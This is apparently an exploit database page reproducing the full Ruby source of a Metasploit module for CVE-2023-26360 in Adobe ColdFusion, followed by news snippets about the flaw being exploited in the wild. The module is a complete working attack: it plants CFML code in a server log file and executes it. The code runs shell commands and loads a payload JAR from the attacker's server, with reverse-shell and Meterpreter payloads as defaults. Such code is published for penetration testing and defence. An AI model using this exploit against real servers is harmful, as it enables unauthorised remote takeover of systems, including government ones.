Headline
Adobe ColdFusion Unauthenticated Remote Code Execution
This Metasploit module exploits a remote unauthenticated deserialization of untrusted data vulnerability in Adobe ColdFusion 2021 Update 5 and earlier as well as ColdFusion 2018 Update 15 and earlier, in order to gain remote code execution.
### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::Remote::HttpServer::HTML include Msf::Exploit::CmdStager def initialize(info = {}) super( update_info( info, 'Name' => 'Adobe ColdFusion Unauthenticated Remote Code Execution', 'Description' => %q{ This module exploits a remote unauthenticated deserialization of untrusted data vulnerability in Adobe ColdFusion 2021 Update 5 and earlier as well as ColdFusion 2018 Update 15 and earlier, in order to gain remote code execution. }, 'License' => MSF_LICENSE, 'Author' => [ 'sf', # MSF Exploit & Rapid7 Analysis ], 'References' => [ ['CVE', '2023-26360'], ['URL', 'https://attackerkb.com/topics/F36ClHTTIQ/cve-2023-26360/rapid7-analysis'] ], 'DisclosureDate' => '2023-03-14', 'Platform' => %w[java win linux unix], 'Arch' => [ARCH_JAVA, ARCH_CMD, ARCH_X86, ARCH_X64], 'Privileged' => true, # Code execution as 'NT AUTHORITY\SYSTEM' on Windows and 'nobody' on Linux. 'WfsDelay' => 30, 'Targets' => [ [ 'Generic Java', { 'Type' => :java, 'Platform' => 'java', 'Arch' => [ ARCH_JAVA ], 'DefaultOptions' => { 'PAYLOAD' => 'java/meterpreter/reverse_tcp' } }, ], [ 'Windows Command', { 'Type' => :cmd, 'Platform' => 'win', 'Arch' => ARCH_CMD, 'DefaultOptions' => { 'PAYLOAD' => 'cmd/windows/powershell_reverse_tcp' } }, ], [ 'Windows Dropper', { 'Type' => :dropper, 'Platform' => 'win', 'Arch' => [ ARCH_X86, ARCH_X64 ], 'CmdStagerFlavor' => [ 'certutil', 'psh_invokewebrequest' ], 'DefaultOptions' => { 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp' } } ], [ 'Unix Command', { 'Type' => :cmd, 'Platform' => 'unix', 'Arch' => ARCH_CMD, 'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_perl' } }, ], [ 'Linux Dropper', { 'Type' => :dropper, 'Platform' => 'linux', 'Arch' => [ARCH_X64], 'CmdStagerFlavor' => [ 'curl', 'wget', 'bourne', 'printf' ], 'DefaultOptions' => { 'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp' } } ], ], 'DefaultTarget' => 0, 'Notes' => { 'Stability' => [CRASH_SAFE], 'Reliability' => [REPEATABLE_SESSION], 'SideEffects' => [ # The following artifacts will be left on disk: # The compiled CFML class generated from the poisoned coldfusion-out.log (Note: the hash number will vary) # * Windows: C:\ColdFusion2021\cfusion\wwwroot\WEB-INF\cfclasses\cfcoldfusion2dout2elog376354580.class # * Linux: /opt/ColdFusion2021/cfusion/wwwroot/WEB-INF/cfclasses/cfcoldfusion2dout2elog181815836.class # If a dropper payload was used, a file with a random name may be left. # * Windows: C:\Windows\Temp\XXXXXX.exe # * Linux: /tmp/XXXXXX ARTIFACTS_ON_DISK, # The following logs will contain IOCs: # C:\ColdFusion2021\cfusion\logs\coldfusion-out.log # C:\ColdFusion2021\cfusion\logs\exception.log # C:\ColdFusion2021\cfusion\logs\application.log IOC_IN_LOGS ], 'RelatedModules' => [ 'auxiliary/gather/adobe_coldfusion_fileread_cve_2023_26360' ] } ) ) register_options( [ Opt::RPORT(8500), OptString.new('URIPATH', [false, 'The URI to use for this exploit', '/']), OptString.new('CFC_ENDPOINT', [true, 'The target ColdFusion Component (CFC) endpoint', '/cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/iedit.cfc']), OptString.new('CF_LOGFILE', [true, 'The target log file, relative to the wwwroot folder.', '../logs/coldfusion-out.log']) ] ) end def check res = send_request_cgi( 'method' => 'GET', 'uri' => '/' ) return CheckCode::Unknown('Connection failed') unless res # We cannot identify the ColdFusion version through a generic technique. Instead we use the Recog fingerprint # to match a ColdFusion cookie, and use this information to detect ColdFusion as being present. # https://github.com/rapid7/recog/blob/main/xml/http_cookies.xml#L69 if res.get_cookies =~ /(CFCLIENT_[^=]+|CFGLOBALS|CFID|CFTOKEN)=|.cfusion/ return CheckCode::Detected('ColdFusion detected but version number is unknown.') end CheckCode::Unknown end def exploit unless datastore['CFC_ENDPOINT'].end_with?('.cfc') fail_with(Failure::BadConfig, 'The CFC_ENDPOINT must point to a .cfc file') end case target['Type'] when :java # Start the HTTP server start_service # Trigger a loadClass request via java.net.URLClassLoader trigger_urlclassloader # Handle the payload... handler when :cmd execute_command(payload.encoded) when :dropper execute_cmdstager end end def on_request_uri(cli, _req) if target['Type'] == :java print_status('Received payload request, transmitting payload jar...') send_response(cli, payload.encoded, { 'Content-Type' => 'application/java-archive', 'Connection' => 'close', 'Pragma' => 'no-cache' }) else super end end def trigger_urlclassloader # Here we construct a CFML payload to load a Java payload via URLClassLoader. # NOTE: If our URL ends with / a XXX.class is loaded, if no trailing slash then a JAR is expected to be returned. cf_url = Rex::Text.rand_text_alpha_lower(4) srvhost = datastore['SRVHOST'] # Ensure SRVHOST is a routable IP address to our RHOST. if Rex::Socket.addr_atoi(srvhost) == 0 srvhost = Rex::Socket.source_address(rhost) end # Create a URL pointing back to our HTTP server. cfc_payload = "<cfset #{cf_url} = createObject('java','java.net.URL').init('http://#{srvhost}:#{datastore['SRVPORT']}')/>" cf_reflectarray = Rex::Text.rand_text_alpha_lower(4) # Get a reference to java.lang.reflect.Array so we can create a URL[] instance. cfc_payload << "<cfset #{cf_reflectarray} = createObject('java','java.lang.reflect.Array')/>" cf_array = Rex::Text.rand_text_alpha_lower(4) # Create a URL[1] instance. cfc_payload << "<cfset #{cf_array} = #{cf_reflectarray}.newInstance(#{cf_url}.getClass(),1)/>" # Set the first element in the array to our URL. cfc_payload << "<cfset #{cf_reflectarray}.set(#{cf_array},0,#{cf_url})/>" cf_loader = Rex::Text.rand_text_alpha_lower(4) # Create a URLClassLoader instance. cfc_payload << "<cfset #{cf_loader} = createObject('java','java.net.URLClassLoader').init(#{cf_array},javaCast('null',''))/>" # Load the remote JAR file and instantiate an instance of metasploit.Payload. cfc_payload << "<cfset #{cf_loader}.loadClass('metasploit.Payload').newInstance().main(javaCast('null',''))/>" execute_cfml(cfc_payload) end def execute_command(cmd, _opts = {}) cf_param = Rex::Text.rand_text_alpha_lower(4) # If the cf_param is present in the HTTP requests www-form encoded data then proceed with the child tags. cfc_payload = "<cfif IsDefined('form.#{cf_param}') is 'True'>" # Set our cf_param with the data in the requests form data, this is the command to run. cfc_payload << "<cfset #{cf_param}=form.#{cf_param}/>" # Here we construct a CFML payload to stage the :cmd and :dropper commands... shell_name = nil shell_arg = nil case target['Platform'] when 'win' shell_name = 'cmd.exe' shell_arg = '/C' when 'linux', 'unix' shell_name = '/bin/sh' shell_arg = '-c' end cf_array = Rex::Text.rand_text_alpha_lower(4) # Create an array of arguments to pass to exec() cfc_payload << "<cfset #{cf_array}=['#{shell_name}','#{shell_arg}',#{cf_param}]/>" cf_runtime = Rex::Text.rand_text_alpha_lower(4) # Get a reference to the java.lang.Runtime class. cfc_payload << "<cfobject action='create' type='java' class='java.lang.Runtime' name='#{cf_runtime}'/>" # Call the static Runtime.exec method to execute our string array holding the command and the arguments. cfc_payload << "<cfset #{cf_runtime}.getRuntime().exec(#{cf_array})/>" # The end of the If tag. cfc_payload << '</cfif>' execute_cfml(cfc_payload, cf_param, cmd) end def execute_cfml(cfml, param = nil, param_data = nil) cfc_payload = '<cftry>' cfc_payload << cfml cfc_payload << "<cfcatch type='any'>" cfc_payload << '</cfcatch>' cfc_payload << '<cffinally>' # Clear the CF_LOGFILE which will contain this CFML code. We need to do this so we can repeatedly execute commands. # GetCurrentTemplatePath returns 'C:\ColdFusion2021\cfusion\wwwroot\..\logs\coldfusion-out.log' as this is the # template we are executing. cfc_payload << "<cffile action='write' file='#GetCurrentTemplatePath()#' output=''></cffile>" cfc_payload << '</cffinally>' cfc_payload << '</cftry>' # We can only log ~950 characters to a log file before the output is truncated, so we enforce a limit here. unless cfc_payload.length < 950 fail_with(Failure::BadConfig, 'The CFC payload is too big to fit in the log file') end # We dont need to call a valid CFC method, so we just create a random method name to supply to the server. cfc_method = Rex::Text.rand_text_alpha_lower(1..8) # Perform the request that writes the cfc_payload to the CF_LOGFILE. res = send_request_cgi( 'method' => 'POST', 'uri' => normalize_uri(datastore['CFC_ENDPOINT']), 'vars_get' => { 'method' => cfc_method, '_cfclient' => 'true' }, 'vars_post' => { '_variables' => "{#{cfc_payload}" } ) unless res && res.code == 200 && res.body.include?('<title>Error</title>') fail_with(Failure::UnexpectedReply, 'Failed to plant the payload in the ColdFusion output log file') end # The relative path from wwwroot to the CF_LOGFILE. cflog_file = datastore['CF_LOGFILE'] # To construct the arbitrary file path from the attacker provided class name, we must insert 1 or 2 characters # to satisfy how coldfusion.runtime.JSONUtils.convertToTemplateProxy extracts the class name. if target['Platform'] == 'win' classname = "#{Rex::Text.rand_text_alphanumeric(1)}#{cflog_file.gsub('/', '\\')}" else classname = "#{Rex::Text.rand_text_alphanumeric(1)}/#{cflog_file}" end json_variables = "{\"_metadata\":{\"classname\":#{classname.to_json}},\"_variables\":[]}" vars_post = { '_variables' => json_variables } unless param.nil? || param_data.nil? vars_post[param] = param_data end # Perform the request that executes the CFML we wrote to the CF_LOGFILE, while passing the shell command to be # executed as a parameter which will in turn be read back out by the CFML in the cfc_payload. res = send_request_cgi( 'method' => 'POST', 'uri' => normalize_uri(datastore['CFC_ENDPOINT']), 'vars_get' => { 'method' => cfc_method, '_cfclient' => 'true' }, 'vars_post' => vars_post ) unless res && res.code == 200 && res.body.include?('<title>Error</title>') fail_with(Failure::UnexpectedReply, 'Failed to execute the payload in the ColdFusion output log file') end endend
Related news
Unnamed government entities in the Middle East and Malaysia are the target of a persistent cyber campaign orchestrated by a threat actor known as Tropic Trooper since June 2023. "Sighting this group's [Tactics, Techniques, and Procedures] in critical governmental entities in the Middle East, particularly those related to human rights studies, marks a new strategic move for them," Kaspersky
Adobe ColdFusion versions 2018,15 and below and versions 2021,5 and below suffer from an arbitrary file read vulnerability.
Everyone's New Year's Resolution should be to stop using passwords altogether.
By Deeba Ahmed CISA Warns of Critical Adobe ColdFusion Vulnerability Actively Exploited by Threat Actors. This is a post from HackRead.com Read the original post: Adobe ColdFusion Flaw Used by Hackers to Access US Govt Servers
CISA has published an advisory about a vulnerability in Adobe Coldfusion used in two attacks against federal agencies.
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) warned of active exploitation of a high-severity Adobe ColdFusion vulnerability by unidentified threat actors to gain initial access to government servers. "The vulnerability in ColdFusion (CVE-2023-26360) presents as an improper access control issue and exploitation of this CVE can result in arbitrary code execution,"
Categories: Exploits and vulnerabilities Categories: News Tags: Adobe Tags: ColdFusion Tags: CVE-2023-26359 Tags: CVE-2023-26360 Tags: critical Tags: known exploited Tags: deserialization A second Adobe ColdFusion vulnerability that was patched in April has been added to CISA's known exploited vulnerabilities catalog. (Read more...) The post Adobe ColdFusion vulnerability exploited in the wild appeared first on Malwarebytes Labs.
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added a critical security flaw in Adobe ColdFusion to its Known Exploited Vulnerabilities (KEV) catalog, based on evidence of active exploitation. The vulnerability, cataloged as CVE-2023-26359 (CVSS score: 9.8), relates to a deserialization flaw present in Adobe ColdFusion 2018 (Update 15 and earlier) and ColdFusion 2021 (
Adobe ColdFusion versions 2018 Update 15 (and earlier) and 2021 Update 5 (and earlier) are affected by an Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability that could result in Arbitrary file system read. Exploitation of this issue does not require user interaction, but does require administrator privileges.
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) on March 15 added a security vulnerability impacting Adobe ColdFusion to its Known Exploited Vulnerabilities (KEV) catalog, based on evidence of active exploitation. The critical flaw in question is CVE-2023-26360 (CVSS score: 8.6), which could be exploited by a threat actor to achieve arbitrary code execution. "Adobe ColdFusion
Categories: Exploits and vulnerabilities Categories: News Tags: patch Tuesday Tags: March Tags: 2023 Tags: Microsoft Tags: Adobe Tags: Fortinet Tags: Android Tags: SAP Tags: CVE-2023-23397 Tags: CVE-2023-24880 Tags: CVE-2023-26360 Tags: CVE-2022-41328 This Patch Tuesday, Microsoft has released fixes for two actively exploited zero-days and Adobe has fixed one. (Read more...) The post Update now! Microsoft fixes two zero-day bugs appeared first on Malwarebytes Labs.